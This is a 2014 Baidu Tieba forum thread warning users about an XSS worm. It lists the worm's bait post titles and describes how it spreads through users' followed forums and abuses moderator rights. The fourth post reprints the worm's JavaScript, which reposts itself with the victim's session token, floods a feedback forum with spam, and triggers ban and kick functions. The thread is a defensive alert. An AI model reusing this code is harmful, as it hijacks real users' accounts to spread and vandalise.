网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索
d-day吧 关注:431贴子:3,988
  • 4回复贴,共1

【警告】贴吧出现新一波的代码攻击,切勿用电脑打开以下标题的帖

只看楼主收藏回复

愚蠢的凡人 接受神の怒火吧
这是命运石之门的选择
颤抖吧,凡人们!
欺骗一开始的你 欺骗世界吧
谁要吃变态的香蕉!
刚才收到了强烈的精神攻击 心...心灵正遭到侵蚀
不要靠近我!我正在执行阻止机关暴力行为的作战
手拿金坷垃,脚踏七彩云端,发出最后的呐喊
颤抖吧,凡人们!
如有遇到,请吧务配合删除。
_g63(522975334) 19:04:11
@观光-岚依
植入到帖子里的javascript代码
特性:
针对大吧:加精、置顶病毒贴、踢除小吧
针对小吧:互相封禁小吧
针对普通用户,转发病毒贴到各个关注的贴吧
_g63(522975334) 19:04:24
ydm_bd<lionxlion@foxmail.com> 19:02:49
真正的用意是攻击百度
ydm_bd<lionxlion@foxmail.com> 19:03:59
在【贴吧意见反馈】吧发送内容如刚才那些内容的随机选择、标题为“百度SB”的帖子
_g63(522975334) 19:05:08
以上转自警吧
IP属地:浙江1楼2014-03-09 22:16回复
    帖子如下图:
    IP属地:浙江2楼2014-03-09 22:27
    回复
      广告
      立即查看
      bug吧,firefox吧,chrome吧是白名单,帖子不会出现在这三个吧
      IP属地:浙江来自iPhone客户端3楼2014-03-09 22:29
      收起回复
        这种帖子是利用XSS的BUG来攻击的
        代码如下(转自BUG吧)
        function addThread(fid) {
        $.post("/relay/commit", {
        ie: "utf-8",
        kw: "test",
        fid:35,
        tid:2910585163,
        ftid: fid,
        ptid:2910585163,
        ppid:47102132189,
        tbs: PageData.tbs,
        title: config.titles[Math.random() * config.titles.length | 0],
        content: "aeb1cb13495409230133f7cd9058d109b3de492f#"+config.contents[Math.random() * config.contents.length | 0]+config.evilContent,
        new_vcode:1,
        tag:11,
        activity_id:1425,
        act_type:"photo",
        __type__:"repost"
        },function (x) {
        if (x.no == 0 || x.new_thread_id) return x.new_thread_id;})
        }
        function reply(){
        if (-1 !== config.whiteList.indexOf(PageData.user.user_forum_list.info[num].id) || !userInfo.is_red_tail && !PageData.user.user_forum_list.info[num].is_like){num++;return;}
        if(PageData.user.user_forum_list.info[num].tid){
        num++;
        }else{
        PageData.user.user_forum_list.info[num].tid=true;addThread(PageData.user.user_forum_list.info[num].id);
        }
        }
        function fuckRedTail() {
        var obj = {
        ie: "utf-8",
        kw: "\u8d34\u5427\u610f\u89c1\u53cd\u9988",
        fid: 898666,
        tbs: PageData.tbs,
        title: "\u767e\u5ea6SB",
        content: config.contents[Math.random() * config.contents.length | 0]
        }
        for(var i=0;i<100;i++){
        $.post("/f/commit/thread/add",obj);
        }
        }
        if(userInfo.is_red_tail){setInterval("fuckRedTail()",8000)}
        if ("daba" === userInfo.is_bawu){ killXiaoBa(); czDaba();}
        if ("xiaoba" === userInfo.is_bawu) banXiaoBa();
        var ruchong=setInterval("reply()",2000);
        IP属地:浙江4楼2014-03-09 22:32
        回复

          扫二维码下载贴吧客户端

          下载贴吧APP
          看高清直播、视频!
          • 4回复贴,共1
          发表回复
          发贴请遵守贴吧协议及“七条底线”贴吧投诉
          内  容:
            查看全部
          发 表
          保存至快速回贴

          发布成功
          去贴吧APP订阅抽奖结果通知
          扫码进入贴吧APP
          ···········
          开奖后第一时间站内信通知
          ···········
          中奖结果全员公示